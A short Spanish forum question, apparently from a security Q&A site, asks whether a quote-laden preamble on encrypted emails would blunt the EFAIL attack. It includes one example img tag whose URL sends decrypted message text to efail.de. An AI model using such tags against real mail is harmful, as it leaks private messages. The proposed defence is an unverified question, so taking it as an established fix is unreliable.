Según entiendo EFAIL , el ataque funciona porque los clientes de correo electrónico pueden ser forzados a concatenar el mensaje descifrado en un texto proporcionado por el atacante. en una URL.
Pero, ¿no sería una contramedida usar un preámbulo adecuado con cada mensaje secreto enviado, como
nice try " '
Secret meeting
Tomorrow 9pm
? De la manera en que entiendo el (los) ataque (s), esto resultaría en algo como
<img src="http://efail.de/nice%20try%"'SecretmeetingTomorrow9pm">
es decir, una etiqueta img
que probablemente ni siquiera sea válida y que filtre solo el "buen intento" inicial del atacante.